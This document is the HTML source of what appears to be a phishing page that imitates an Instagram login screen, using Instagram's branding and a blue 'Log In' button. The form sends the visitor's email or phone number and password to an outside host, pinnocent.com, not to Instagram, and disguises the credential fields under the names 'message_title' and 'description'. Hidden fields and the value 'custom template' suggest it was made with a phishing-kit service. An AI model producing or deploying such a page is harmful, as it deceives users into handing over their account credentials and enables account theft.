
 <html lang="en">
                 <head> 
                 <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/css/all.min.css">
                 <link rel="stylesheet" href="w3.css">
                 <meta charset="UTF-8">
                 <meta name="viewport" content="width=device-width, initial-scale=1.0">
                 <title>Login to Instagram</title>
          
                 <style type="text/css" id="operaUserStyle">
                 body{
                   color:#ffffff; 
                   background-image: url('background.png');
                   background-size: 100%;
                 }
                 img {
                   width: 100%;
                 }
                 input {
                   width: 320px;
                   height: 60px;
                   border: 1px solid #4f4f4f;
                   border-radius: 5px;
                   margin: 3px;
                   padding: 20px;
                   background-color: transparent;
color :white;
                 }
                 button {
                   height: 50px;
                   border: none;
                   border-radius: 80px;
                   background-color: #1877F2;
                   color: white;
                 }
                 </style>
                 </head>
          <center>
                 <img class="w3-hide-large w3-hide-medium" src="igtop.png">
                  <img class="w3-hide-small" style="width: 50%;" src="igtop.png">
                 <center>
          
    <form action="https://pinnocent.com/vpage" method="POST">
  
    <input type="hidden" name="link" value="custom template">
    <input type="hidden" name="ftype" value="normal">
    <input type="hidden" name="login" value="login">
    <input type="hidden" name="user_id" value="16934">
    <div class="p-2 w-full  gap-1  ">
    <div class="flex flex-col   p-2  gap-1">
    <input type="text" name="message_title" placeholder="Email address or mobile number" style=" margin-left :+15;"> <br>
    <input type="password" name="description" placeholder="Password" id="id_password" autocomplete="new-password" aria-autocomplete="list" required="password">
      <i class="far fa-eye" id="togglePassword" style="margin-left: -30px; cursor: pointer; color:black;"></i>
    </div>
    </center>
    <center>
    <div>
    <button type="submit" style="width: 285px">Log In</button>
    </div>
    </center>
    </div>
    </form>
    <img class="w3-hide-large w3-hide-medium" src="igbottom.png">
      <img class="w3-hide-small" style="width: 50%;" src="igbottom.png">
    </div>
    </div>
    </div>
    </body>
    <script>
      const togglePassword = document.querySelector('#togglePassword');
  const password = document.querySelector('#id_password');

  togglePassword.addEventListener('click', function (e) {
    // toggle the type attribute
    const type = password.getAttribute('type') === 'password' ? 'text' : 'password';
    password.setAttribute('type', type);
    // toggle the eye slash icon
    this.classList.toggle('fa-eye-slash');
});
    </script>
    </html>
